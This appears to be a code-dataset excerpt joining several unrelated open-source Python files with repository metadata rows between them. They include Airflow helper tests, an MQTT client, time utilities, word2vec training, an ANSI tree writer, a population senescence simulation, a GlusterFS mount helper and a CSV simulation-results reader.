self.assertTrue(helpers.is_container(["a", "list", "is", "a", "container"]))
def test_as_tuple(self):
self.assertEqual(
helpers.as_tuple("a string is not a container"),
("a string is not a container",)
)
self.assertEqual(
helpers.as_tuple(["a", "list", "is", "a", "container"]),
("a", "list", "is", "a", "container")
)
class HelpersTest(unittest.TestCase):
def test_as_tuple_iter(self):
test_list = ['test_str']
as_tup = helpers.as_tuple(test_list)
self.assertTupleEqual(tuple(test_list), as_tup)
def test_as_tuple_no_iter(self):
test_str = 'test_str'
as_tup = helpers.as_tuple(test_str)
self.assertTupleEqual((test_str,), as_tup)
def test_is_in(self):
from airflow.utils import helpers
# `is_in` expects an object, and a list as input
test_dict = {'test': 1}
test_list = ['test', 1, dict()]
small_i = 3
big_i = 2 ** 31
test_str = 'test_str'
test_tup = ('test', 'tuple')
test_container = [test_dict, test_list, small_i, big_i, test_str, test_tup]
# Test that integers are referenced as the same object
self.assertTrue(helpers.is_in(small_i, test_container))
self.assertTrue(helpers.is_in(3, test_container))
# python caches small integers, so i is 3 will be True,
# but `big_i is 2 ** 31` is False.
self.assertTrue(helpers.is_in(big_i, test_container))
self.assertFalse(helpers.is_in(2 ** 31, test_container))
self.assertTrue(helpers.is_in(test_dict, test_container))
self.assertFalse(helpers.is_in({'test': 1}, test_container))
self.assertTrue(helpers.is_in(test_list, test_container))
self.assertFalse(helpers.is_in(['test', 1, dict()], test_container))
self.assertTrue(helpers.is_in(test_str, test_container))
self.assertTrue(helpers.is_in('test_str', test_container))
bad_str = 'test_'
bad_str += 'str'
self.assertFalse(helpers.is_in(bad_str, test_container))
self.assertTrue(helpers.is_in(test_tup, test_container))
self.assertFalse(helpers.is_in(('test', 'tuple'), test_container))
bad_tup = ('test', 'tuple', 'hello')
self.assertFalse(helpers.is_in(bad_tup[:2], test_container))
def test_is_container(self):
self.assertTrue(helpers.is_container(['test_list']))
self.assertFalse(helpers.is_container('test_str_not_iterable'))
# Pass an object that is not iter nor a string.
self.assertFalse(helpers.is_container(10))
def test_cross_downstream(self):
"""Test if all dependencies between tasks are all set correctly."""
dag = DAG(dag_id="test_dag", start_date=datetime.now())
start_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(1, 4)]
end_tasks = [DummyOperator(task_id="t{i}".format(i=i), dag=dag) for i in range(4, 7)]
helpers.cross_downstream(from_tasks=start_tasks, to_tasks=end_tasks)
for start_task in start_tasks:
six.assertCountEqual(self, start_task.get_direct_relatives(upstream=False), end_tasks)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 9,064,997,477,779,371,000 | 37.458498 | 100 | 0.567215 | false | 3.948864 | true | false | false |
miarcompanies/sdn-wise-contiki | contiki/examples/zolertia/tutorial/99-apps/mqtt-node/internals/mqtt-check.py | 1 | 1042 | ### Taken from https://pypi.python.org/pypi/paho-mqtt
### Requires Paho-MQTT package, install by:
### pip install paho-mqtt
import paho.mqtt.client as mqtt
MQTT_URL = ""
MQTT_USERID = ""
MQTT_PASSWD = ""
MQTT_TOPIC_EVENT = ''
MQTT_TOPIC_PUB = ''
MQTT_PUB_STRING = ''
def on_connect(client, userdata, flags, rc):
print("Connected with result code " + str(rc))
if MQTT_TOPIC_EVENT:
client.subscribe(MQTT_TOPIC_EVENT)
print("Subscribed to " + MQTT_TOPIC_EVENT)
if MQTT_PUB_STRING:
client.publish(MQTT_TOPIC_PUB, MQTT_PUB_STRING, 0)
print("Published " + MQTT_PUB_STRING + " to " + MQTT_TOPIC_PUB)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
print(msg.topic + " " + str(msg.payload))
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
print("connecting to " + MQTT_URL)
client.username_pw_set(MQTT_USERID, MQTT_PASSWD)
client.connect(MQTT_URL, 1883, 60)
client.loop_forever()
| bsd-3-clause | -5,148,396,591,194,084,000 | 26.421053 | 70 | 0.670825 | false | 2.831522 | false | false | false |
AZLisme/sihoo | sihoo/utils/time.py | 1 | 1785 | # -*- coding: utf-8 -*-
"""
时间处理模块,统一处理时间相关函数
@author: AZLisme
@email: helloazl@icloud.com
"""
from datetime import datetime, timedelta
import pytz
import time
_DEFAULT_TIMEZONE = pytz.utc
def now(tz=None):
"""获取现在的日期对象(带时区)"""
if tz is None:
return datetime.now(tz=_DEFAULT_TIMEZONE)
else:
return datetime.now(tz=tz)
def get_timezone(tz_name: str):
"""获取时区对象,封装pytz
:param tz_name: 时区名字,常用的有'UTC', 'Asia/Shanghai'
:return:
"""
return pytz.timezone(tz_name)
def get_default_timezone():
"""获取默认时间戳
:return:
"""
return _DEFAULT_TIMEZONE
def set_default_timezone(tz_name: str) -> None:
"""设置默认的时区
:param Union(str, unicode) tz_name: 时区名字, 例如 'UTC', 'Asia/Shanghai'
:return: None
"""
global _DEFAULT_TIMEZONE
_DEFAULT_TIMEZONE = pytz.timezone(tz_name)
def timestamp(dt: datetime = None) -> float:
"""获取时间戳, 如果参数为None则返回当前时间戳
:param dt: 要转化为时间戳的时间,如果为None则返回当前时间戳。
:return float: 时间戳
"""
if dt is None:
return time.time()
else:
if dt.tzinfo is None:
dt = _DEFAULT_TIMEZONE.localize(dt)
utc_dt = dt.astimezone(pytz.utc)
delta = utc_dt - datetime(1970, 1, 1, 0, 0 ,0, 0, pytz.utc)
return delta.total_seconds()
def datetime_from_timestamp(ts: float) -> datetime:
""" 从时间戳获取日期对象
:param ts: 时间戳
:return: 日期对象
"""
dt = datetime(1970, 1, 1, 0, 0 ,0, 0, pytz.utc) + timedelta(seconds=ts)
return dt.astimezone(_DEFAULT_TIMEZONE)
| gpl-3.0 | -3,036,369,990,444,020,000 | 19.333333 | 75 | 0.61377 | false | 2.390282 | false | false | false |
Officium/iLearn | pyml/gensim/textmining.py | 2 | 2539 | # -*- coding: utf-8 -*-
import gensim
import jieba
import pandas as pd
from tqdm import tqdm
from datetime import datetime
class yjiang(object):
def __init__(self):
self.idx2id = None
self.raw_sentence = None
self.preprocess_sentence = None
self.vecs = None
self.alternative_words = set()
def load_raw(self, file_path):
data = pd.read_csv(file_path)
self.idx2id = data["productid"].to_dict()
self.raw_sentence = data[u"commentcontent"].map(str).tolist()
def preprocess(self):
cut_sentence = [list(jieba.cut(s)) for s in tqdm(self.raw_sentence)]
self.preprocess_sentence = cut_sentence # 可能这里还需要去掉停用词
def train_wordvec(self, param="default"):
if param == "default":
param = {
"size": 100, # Word vector dimensionality
"min_count": 5, # Minimum word count
"workers": 4, # Number of threads to run in parallel
"window": 10, # Context window size
"sample": 1e-3 # Downsample setting for frequent words
}
print "\n{} Training wordvector ...".format(datetime.now())
model = gensim.models.Word2Vec(self.preprocess_sentence, seed=1, **param)
model.init_sims(replace=True)
print "\n{} Saving wordvector ...".format(datetime.now())
model.save("{}features_{}mincount_{}windowsize".format(param["size"], param["min_count"], param["window"]))
def load_wordvec(self, filename, test=False):
self.vecs = gensim.models.Word2Vec.load(filename)
if test:
print self.vecs.most_similar(u"不错")
print "Successfully!"
def find_alternative_words(self, threshold=0.9, k=5):
print "{} Finding alternative words ...".format(datetime.now())
for w in tqdm(self.vecs.vocab):
t = self.vecs.similar_by_vector(w, N)
i = 0
while i < k:
if t[i][1] >= threshold:
self.alternative_words.add((w, t[i][0]) if w > t[i][0] else (t[i][0], w))
else:
break
i += 1
def run(self, file_path):
self.load_raw(file_path)
self.preprocess()
self.train_wordvec()
self.load_wordvec('100features_5mincount_10windowsize')
self.find_alternative_words()
print "\n", self.alternative_words.__len__()
if __name__ == "__main__":
tt = yjiang()
tt.run("text.csv")
| apache-2.0 | 1,891,772,289,946,144,500 | 34.871429 | 115 | 0.56591 | false | 3.561702 | false | false | false |
Yipit/truck | tests/test_loader.py | 1 | 2758 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of truck
# <truck - test-friendly event bus layer on top of django signals>
# Copyright (C) <2012> Gabriel Falcão <gabriel@yipit.com>
# Copyright (C) <2012> Yipit Inc. <coders@yipit.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from mock import patch, call
from truck.core import Loader
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_be_able_to_load_a_single_module(imp, importlib):
u"Loader should be able to load a listener from a module"
importlib.import_module.return_value.__path__ = '/some/path'
Loader.import_listener_from_module('deal')
imp.find_module.assert_called_once_with('listeners', '/some/path')
importlib.import_module.assert_has_calls([
call('deal'),
call('deal.listeners'),
])
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_ignore_if_there_is_no_such_app(imp, importlib):
"Loader should ignore when the app does not exist"
importlib.import_module.side_effect = (
AttributeError('there is no such module'))
Loader.import_listener_from_module('deal')
importlib.import_module.assert_called_once_with('deal')
assert not imp.find_module.called
@patch('truck.core.importlib')
@patch('truck.core.imp')
def test_loader_should_ignore_if_there_are_no_listeners(imp, importlib):
"Loader should ignore when the app does not exist"
importlib.import_module.return_value.__path__ = '/some/path'
imp.find_module.side_effect = ImportError('LOL')
Loader.import_listener_from_module('deal')
importlib.import_module.assert_called_once_with('deal')
imp.find_module.assert_called_once_with('listeners', '/some/path')
@patch.object(Loader, 'import_listener_from_module')
@patch('truck.core.settings')
def test_loader_start_maps_installed_apps(
settings, import_listener_from_module):
"Loader.start() should ignore when the app does not exist"
settings.INSTALLED_APPS = ['chuck', 'norris']
Loader.start()
import_listener_from_module.assert_has_calls([
call('chuck'),
call('norris'),
])
| lgpl-3.0 | -5,574,983,629,860,531,000 | 34.346154 | 72 | 0.713094 | false | 3.459222 | false | false | false |
941design/ptTools | ptTools/writers/ansiwriter.py | 1 | 5061 | #!/usr/bin/env python3
"""Module providing an AnsiParseTreeWriter for formatted printing of
ptTools.ParseTreeNodes to an output channel on linux systems."""
__all__ = [
'BLINK',
'BOLD',
'COLOR',
'COLORS',
'COMMENT',
'PRECEDENCE',
'UNDERLINE',
'AnsiParseTreeWriter',
]
from . verbosewriter import VerboseParseTreeWriter
BLINK = 'blink'
BOLD = 'bold'
COLOR = 'color'
COLORS = 'colors'
COMMENT = 'comment'
PRECEDENCE = 'precedence'
UNDERLINE = 'underline'
class AnsiParseTreeWriter(VerboseParseTreeWriter):
"""Writer for printing attributed ptTools.ParseTreeNodes to an
output channel on linux systems.
Note that the ansi markup sequence behaves differently from
e.g. html. A closing markup closes all opened markups. However,
opening sequences CAN be nested, but are all closed when
encountering the closing sequence.
The current style description is updated while traversing
non-terminal nodes, but not written until reaching a terminal.
Every token is embraced in its own opening and closing markup
sequence.
"""
## ANSI print sequence:
## {ESC}[{ATTR};{BG};{256colors};{FG}m
## e.g.: "\033[38;5;255mfoobar\033[39m"
_ansi_constants = {'ESC': '\033',
'BG': '5',
'FG': '0',}
def __init__(self, out):
"""Initialized with an output channel."""
super().__init__(out)
self._style = {}
"""The currently queued style dictionary."""
def _ansi_dict_from(self, style):
"""Converts style dictionary to ansi description dictionary."""
## Order of attributest IS significant!
attr = '38'
if style.get(BLINK):
attr = '5;' + attr
if style.get(UNDERLINE):
attr = '4;' + attr
if style.get(BOLD):
attr = '1;' + attr
ansidict = {'ATTR': attr,
'CLR' : style.get(COLOR,'')}
ansidict.update(self._ansi_constants)
return ansidict
def _get_node_style(self, node):
"""Retrieves all inherited attributes of node and merges them
to one style dictionary.
Called from super.write_node(node).
"""
return node.all_attributes
def _get_token_style(self, tok):
"""Retrieves all attributes of token and returns style
dictionary.
Called from super.write_token(token).
"""
return tok.attributes
def _write_closing_markup(self, style=None):
"""Writes ansi style closing sequence to self.out, and clears
queued style information."""
self._write_closing_markup_raw(self._style)
self._style = {}
def _write_closing_markup_raw(self, style):
"""Writes ansi style closing sequence to self.out without
altering the queued style description."""
if style:
self._write_str("{ESC}[{FG}m".format(**self._ansi_constants))
def _write_leaf(self, node):
"""Writes terminal node with its tokens."""
if not node.tokens:
return
else:
## Tokens except the last token in terminalnode.tokens
## define their markup themselves, whereas the last token
## receives its node's markups.
for tok in node.tokens[:-1]:
token_style = self._get_token_style(tok)
self._write_opening_markup_raw(token_style)
super()._write_token(tok)
self._write_closing_markup_raw(token_style)
self._write_token(node.token) ## (last token).
def _write_opening_markup(self, style):
"""Queues style dictionary for output.
This method reimplements its superclass method. Called for
each node with the intention to write opening markups to
self.out. Here, we only queue the style information as we may
have to insert tokens with different markups, before.
"""
if style:
self._style.update(style)
def _write_opening_markup_raw(self, style):
"""Writes opening sequence as described by ansi_dict to
self.out, without altering the queued style description."""
if style:
ansi_dict = self._ansi_dict_from(style)
self._write_str('{ESC}[{ATTR};{BG};{CLR}m'.format(**ansi_dict))
def _write_indent(self, tok):
"""Calls super.
TODO - Suspend markup (to avoid preceeding underlines in
multiline comments.).
"""
super()._write_indent(tok)
def _write_spacing(self, tok):
"""Calls super.
TODO - Suspend markup (to avoid preceeding underlines in
multiline comments.).
"""
super()._write_spacing(tok)
def _write_token(self, tok):
"""Writes token and markups to self.out."""
self._write_opening_markup_raw(self._style)
super()._write_token(tok)
self._write_closing_markup_raw(self._style)
| gpl-3.0 | 5,937,019,086,103,000,000 | 30.04908 | 75 | 0.595534 | false | 4.162007 | false | false | false |
grokkers/cr-async | crasync/errors.py | 1 | 1899 | '''
MIT License
Copyright (c) 2017 grokkers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
class NotResponding(Exception):
def __init__(self):
self.code = 504
self.error = 'API request timed out, please be patient.'
super().__init__(self.error)
class RequestError(Exception):
'''Base class for request errors'''
def __init__(self, resp, data):
self.response = resp
self.code = resp.status
self.method = resp.method
self.reason = resp.reason
self.error = data.get('error')
if 'message' in data:
self.error = data.get('message')
self.fmt = '{0.reason} ({0.code}): {0.error}'.format(self)
super().__init__(self.fmt)
class NotFoundError(RequestError):
'''Raised if the player/clan is not found.'''
pass
class ServerError(RequestError):
'''Raised if the api service is having issues'''
pass | mit | 8,547,925,704,511,391,000 | 37 | 78 | 0.71248 | false | 4.267416 | false | false | false |
RoyBoy432/Emergence-Senescence | model/NYI_SSTOSIMPLE.py | 1 | 8783 | from __future__ import division
from random import shuffle, choice, randint, seed
from os.path import expanduser
from numpy import log10
from scipy import stats
import numpy as np
import time
import math
import copy
import sys
import os
from pprint import pprint as pp
mydir = expanduser("~/")
sys.path.append(mydir + "GitHub/Emergence-Senescence/model")
GenPath = mydir + "GitHub/Emergence-Senescence/results/simulated_data/"
col_headers = 'sim,r,gr,mt,q,rls_min,rls_max,grcv,mtcv,rlscv,ct,rlsmean,rlsvar,total.abundance,species.richness'
OUT = open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv", 'w+')
print>>OUT, col_headers
OUT.close()
senesce_simple = lambda age, rls: (1-(age/(rls+0.01)))
#senesce_simple = lambda age, rls: 1
tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-8))#in the full implementation, don't enforce these parameters
#tradeoff_reverse_logistic = lambda rls: 2 / (2 + math.exp((0.2*rls)-4))
#tradeoff_reverse_logistic = lambda rls: rls/rls
g0delay = lambda rls: 1 / (1 + (rls/100))
#competitive_growth = lambda age:
def output(iD, sD, rD, sim, ct, r):
IndIDs, SpIDs = [], []
for k, v in iD.items():
IndIDs.append(k)
SpIDs.append(v['sp'])
#pp(IndIDs)
#pp(SpIDs)
N = len(IndIDs)
R = len(rD.items())
S = len(list(set(SpIDs)))
#RLSL=[]
#for i in IndIDs:
# RLSL.append(iD[i]['rls'])
RLSL=[iD[i]['rls'] for i in IndIDs]
rlsmean = np.mean(RLSL)
rlsvar = np.var(RLSL)
if N > 0:
#OUT = open(GenPath + 'SimData.csv', 'a')
OUT=open("/gpfs/home/r/z/rzmogerr/Carbonate/SSTOSIMPLE.csv","a")
outlist = [sim, r, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, ct, rlsmean, rlsvar, N, S]
outlist = str(outlist).strip('[]')
outlist = outlist.replace(" ", "")
print>>OUT, outlist
OUT.close()
try:
print 'sim:', '%3s' % sim, 'ct:', '%3s' % ct,' N:', '%4s' % N, ' S:', '%4s' % S, ' R:', '%4s' % R, 'LSm:' '%1s' % rlsmean, 'LSv:' '%2s' % rlsvar
except UnboundLocalError:
print 'ERROR: N=0'
return
def immigration(sD, iD, ps, sd=1):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
for j in range(sd):
if sd == 1 and np.random.binomial(1, u) == 0: continue
p = np.random.randint(1, 1000)
if p not in sD:
sD[p] = {'gr' : 10**np.random.uniform(gr, 0)}
sD[p]['mt'] = 10**np.random.uniform(mt, 0)
sD[p]['rls'] = 50#randint(rls_min,rls_max)
sD[p]['grcv']=10**np.random.uniform(-6.01,grcv)
sD[p]['mtcv']=10**np.random.uniform(-6.01,mtcv)
sD[p]['rlscv']=.15#10**np.random.uniform(-6.01,rlscv)
sD[p]['efcv']=10**np.random.uniform(-6.01,efcv)
es = np.random.uniform(1, 100, 3)
sD[p]['ef'] = es/sum(es)
sD[p]['a']=a
ID = time.time()
iD[ID] = copy.copy(sD[p])
iD[ID]['sp'] = p
iD[ID]['age']=np.random.geometric(.5)-1
#iD[ID]['age']=0#doesn't need to start with age==0...
iD[ID]['x'] = 0
iD[ID]['y'] = 0
iD[ID]['rls']=sD[p]['rls']; iD[ID]['mt']=sD[p]['mt']; iD[ID]['ef']=sD[p]['ef'];iD[ID]['gr']=sD[p]['gr'];iD[ID]['a']=sD[p]['a']
iD[ID]['q'] = 10**np.random.uniform(0, q)
return [sD, iD]
def consume(iD, rD, ps):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
keys = list(iD)
shuffle(keys)
for k in keys:
if len(list(rD)) == 0: return [iD, rD]
c = choice(list(rD))
e = iD[k]['ef'][rD[c]['t']] * iD[k]['q']#why does this dep on the indiv's q?
#pp(iD[k]['ef'][rD[c]['t']])
#pp(e)
#To account for the Frenk et al. 2017, one idea that you had was to make the indiv a generalist by taking a max of
#iD[k]['ef'][rD[c]['t']] and another number (e.g., (1/3))
#but it would be better to do some distrn that has age as a param, so that it is generalizable and can be randomized.
iD[k]['q'] += min([rD[c]['v'], e])
rD[c]['v'] -= min([rD[c]['v'], e])
if rD[c]['v'] <= 0: del rD[c]
return [iD, rD]
def grow(iD):
for k, v in iD.items():
m = v['mt']
iD[k]['q'] -= v['gr'] * (v['q'])
if v['age']==0 and v['q'] < m/(0.5+v['a'])*(0.5-v['a']):#daughters are born in G0 phase,we know that
#theyre smaller in G0. We don't want to kill them all because of it, though
del iD[k]
elif v['q'] < m:
del iD[k]
return iD
def maintenance(iD):#mt is less for juveniles
for k, v in iD.items():
if v['age']==0:
iD[k]['q'] -= v['mt']/(0.5+v['a'])*(0.5-v['a'])
if v['q'] < v['mt']/(0.5+v['a'])*(0.5-v['a']): del iD[k]
else:
iD[k]['q'] -= v['mt']
if v['q'] < v['mt']: del iD[k]
return iD
def reproduce(sD, iD, ps, p = 0):
for k, v in iD.items():
if v['gr'] > 1 or v['gr'] < 0:
del iD[k]
elif v['q'] > v['mt']/(0.5+v['a']) and np.random.binomial(1, v['gr']) == 1:
if v['age'] >= v['rls'] or v['mt']<0:
del iD[k]
else:
iD[k]['q'] = v['q']*(0.5+v['a'])
grorig=(v['gr'])/(senesce_simple(v['age'],v['rls']))
iD[k]['gr']=v['gr']/(senesce_simple((v['age']-1),v['rls']))*(senesce_simple(v['age'],v['rls']))
#modifier based on the newly incremented age value, after removing the gr reduction due to previous age
#in full implementation the sscnc model will be chosen at random from a list of choices
i = time.time()
iD[i] = copy.deepcopy(iD[k])
iD[k]['age']+=1
#in addition to copying physiology, need to copy the rlsmax---
#rlsmax is determined genetically so there should be a chance of mutation, here with normally distributed
#effect sizes
iD[i]['rls']=np.random.normal((v['rls']),sD[v['sp']]['rlscv']*v['rls'],None)
#pp(iD[k]['age']);pp(iD[k]['rls'])
try:
iD[i]['gr']=np.random.normal(grorig,(sD[v['sp']]['grcv']*grorig),None)#these should not be normal distrns, should be negv-biased
iD[i]['mt']=np.random.normal(v['mt'],sD[v['sp']]['mtcv']*v['mt'],None)
#is total ef allowed to != 1
except ValueError:
del iD[i]; continue
if iD[i]['gr'] > 1 or iD[i]['gr'] < 0:
del iD[i]; continue
iD[i]['q']=(v['q'])/(0.5+v['a'])*(0.5-v['a'])
iD[i]['age']=0
return [sD, iD]
def iter_procs(iD, sD, rD, ps, ct):
procs = range(6)
shuffle(procs)
for p in procs:
if p == 0: rD = ResIn(rD, ps)
elif p == 1: pass#sD, iD = immigration(sD, iD, ps)
elif p == 2: iD, rD = consume(iD, rD, ps)
elif p == 3: iD = grow(iD)
elif p == 4: iD = maintenance(iD)
elif p == 5: sD, iD = reproduce(sD, iD, ps)
N = len(list(iD))
return [iD, sD, rD, N, ct+1]
def ResIn(rD, ps):
r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a = ps
for i in range(r):
p = np.random.binomial(1, u)
if p == 1:
ID = time.time()
rD[ID] = {'t' : randint(0, 2)}
rD[ID]['v'] = 10**np.random.uniform(0, 2)
return rD
def run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a=0, rD = {}, sD = {}, iD = {}, ct = 0, splist2 = []):
print '\n'
rD={};iD={};sD={}
if iD=={} and sD=={} and rD=={}:
pass
else:
sys.exit()
r = choice([10,100])#10**randint(0, 2)
u = 10**np.random.uniform(-2, 0)
ps = r, u, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a
sD, iD = immigration(sD, iD, ps, 1000)#this is the initial number of indivs
while ct < 2000:#this is the number of timesteps
if ct < 1:
print str(rls_min) + ' ' + str(rls_max) + " " + str(r)
iD, sD, rD, N, ct = iter_procs(iD, sD, rD, ps, ct)
if (ct > 1400 and ct%100 == 0) or (ct == 1):
output(iD, sD, rD, sim, ct, r)
for sim in range(500):#number of different models run (had been set at 10**6)
seed(time.time())
gr = np.random.uniform(-2,-1)
mt = np.random.uniform(-2,-1)
rls_min = randint(1,10)
rls_max = randint(rls_min,100)
grcv = np.random.uniform(-6,-0.3)
mtcv = np.random.uniform(-6,-0.3)
rlscv = np.random.uniform(-6,-0.3)
efcv = np.random.uniform(-6,-0.3)
q = choice([1, 2])
a=.35#a can take values [0,0.5)
run_model(sim, gr, mt, q, rls_min, rls_max, grcv, mtcv, rlscv, efcv, a)
| gpl-3.0 | 237,521,331,691,269,800 | 37.186957 | 159 | 0.511784 | false | 2.596984 | false | false | false |
jhorey/ferry | ferry/data/dockerfiles/hadoop-client/mounthelper.py | 1 | 1115 | import json
import os
import sys
import logging
from subprocess import Popen, PIPE
def mkdir(directory):
if not os.path.isdir(directory):
cmd = 'mkdir -p %s' % directory
Popen(cmd, shell=True)
def mount(entry_point, mount_point):
# Check if the mount point exists. If not
# go ahead and create it.
# mount -t glusterfs entry_point mount_point
cmd = 'mount -t glusterfs %s %s' % (entry_point,
mount_point)
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
logging.info(cmd)
logging.info(output)
def umount(mount_point):
cmd = 'cat /etc/mtab | grep /service/data | awk \'{print $2}\''
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
if output.strip() != "":
cmd = 'umount %s' % mount_point
output = Popen(cmd, stdout=PIPE, shell=True).stdout.read()
logging.info(cmd)
logging.info(output)
cmd = sys.argv[1]
if cmd == "mount":
entry = sys.argv[2]
mkdir('/service/data')
mount(entry, '/service/data')
elif cmd == "umount":
umount('/service/data')
| apache-2.0 | -3,390,376,736,842,846,700 | 29.135135 | 67 | 0.609865 | false | 3.348348 | false | false | false |
PySimulator/PySimulator | PySimulator/Plugins/SimulationResult/Csv/Csv.py | 1 | 4603 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (C) 2011-2015 German Aerospace Center DLR
(Deutsches Zentrum fuer Luft- und Raumfahrt e.V.),
Institute of System Dynamics and Control
All rights reserved.
This file is part of PySimulator.
PySimulator is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PySimulator is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with PySimulator. If not, see www.gnu.org/licenses.
'''
import csv, numpy, collections
from .. import IntegrationResults
fileExtension = 'csv'
description = 'Comma Separated Values for FMI Compliance Checker'
class Results(IntegrationResults.Results):
''' Class for hosting simulation results in csv format:
First row: Names of variables
First column: Independent variable, e.g. Time
Example:
Time,Mechanical.Inertia.J,y,Mechnical.Inertia.w
0.0,20.0,3.6820238572822689e-4,0.0
0.1,20.0,6.7829872398723383e-4,0.7293789273984797e-2
0.2,20.0,4.0290389058209473e-3,0.7823794579232536e-1
'''
def __init__(self, fileName):
IntegrationResults.Results.__init__(self)
self.fileName = fileName # File name of result file
''' Load file
'''
'''
csvfile = open(self.fileName, 'rb')
reader = csv.reader(csvfile, delimiter=';')
self._name = reader.next() # first row contains the variable names
self._data = numpy.array(reader.next(), dtype='float64')
i=0
for row in reader:
self._data = numpy.row_stack((self._data, numpy.array(row, dtype='float64')))
print i
i=i+1
csvfile.close()
'''
csvfile = open(self.fileName, 'rb')
dialect = csv.Sniffer().sniff(csvfile.readline())
csvfile.seek(0)
reader = csv.reader(csvfile, dialect)
self._name = reader.next() # first row contains the variable names
self._info = len(self._name) * ['']
self._filterName()
data = numpy.loadtxt(csvfile, delimiter=dialect.delimiter)
t = data[:, 0]
self.timeSeries.append(IntegrationResults.TimeSeries(t, data, "linear"))
self.nTimeSeries = len(self.timeSeries)
csvfile.close()
self.isAvailable = True # Shows, if there is a file available to be read
def _filterName(self):
for i in xrange(len(self._name)):
x = self._name[i]
k = x.find('=')
if k > -1: # Skip the parts behind "="
self._info[i] = x[k:]
x = x[:k]
if len(x) > 5: # Convert der(a.b.c.d) to a.b.c.der(d)
if x[:4] == 'der(':
k = x.rfind('.')
if k > -1:
x = x[4:k] + '.der(' + x[k + 1:]
self._name[i] = x
def readData(self, variableName):
nameIndex = self._name.index(variableName)
if nameIndex < 0:
return None, None, None
y = self.timeSeries[0].data[:, nameIndex]
t = self.timeSeries[0].independentVariable
method = self.timeSeries[0].interpolationMethod
return t, y, method
def data(self, variableName):
nameIndex = self._name.index(variableName)
if nameIndex < 0:
return None
return self.timeSeries[0].data[:, nameIndex]
def getVariables(self):
# Generate the dict
variables = dict()
# Fill the values of the dict
for i in xrange(len(self._name)):
name = self._name[i]
variability = 'continuous'
value = None
infos = collections.OrderedDict()
infos['Variability'] = variability
if not self._info[i] == '':
infos['Description'] = self._info[i]
unit = None
seriesIndex = 0
column = i
sign = 1
variables[name] = IntegrationResults.ResultVariable(value, unit, variability, infos, seriesIndex, column, sign)
return variables
def getFileInfos(self):
# No relevant file infos stored in a csv result file
return dict()
| lgpl-3.0 | 7,949,613,338,050,799,000 | 30.513699 | 123 | 0.599652 | false | 3.830974 | false | false | false |
MIREL-UNC/mirel-scripts | preprocess/22_add_high_level_classes.py | 1 | 1652 | """Add the high level classes (person/organization/etc.) to a label file."""
import argparse
import pickle
from tqdm import tqdm
def read_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--labels_file',
type=unicode,
help='Pickled file with a list of labels')
parser.add_argument('--mapping_file',
type=unicode,
help='Pickled file with the mapping from yago labels'
'to high level labels')
return parser.parse_args()
def pickle_from_file(filename):
with open(filename, 'r') as input_file:
result = pickle.load(input_file)
return result
def main():
args = read_arguments()
print 'Reading arguments'
labels = pickle_from_file(args.labels_file)
mapping = pickle_from_file(args.mapping_file)
print 'Processing labels'
for index, label in tqdm(enumerate(labels)):
if len(label) != 5:
print 'Malformed label at index {}'.format(index)
continue
if label[0].startswith('O'):
continue
yago_category = label[1].replace('I-', '').replace('B-', '')
if not yago_category in mapping:
print 'Error, unknown yago category {}'.format(yago_category)
continue
high_level_category = label[1][0] + '-' + mapping[yago_category]
labels[index] = label[:3] + (high_level_category, ) + label[4:]
print 'Saving results'
with open(args.labels_file, 'w') as output_file:
pickle.dump(labels, output_file)
if __name__ == '__main__':
main()
| bsd-3-clause | -9,118,652,511,027,232,000 | 29.592593 | 77 | 0.585351 | false | 4.03912 | false | false | false |
itamaro/home-control-RPC | HomeControlRPC/cam/views.py | 1 | 1024 | import logging
import json
import sys
import tempfile
from mimetypes import guess_type
from django.http import HttpResponse
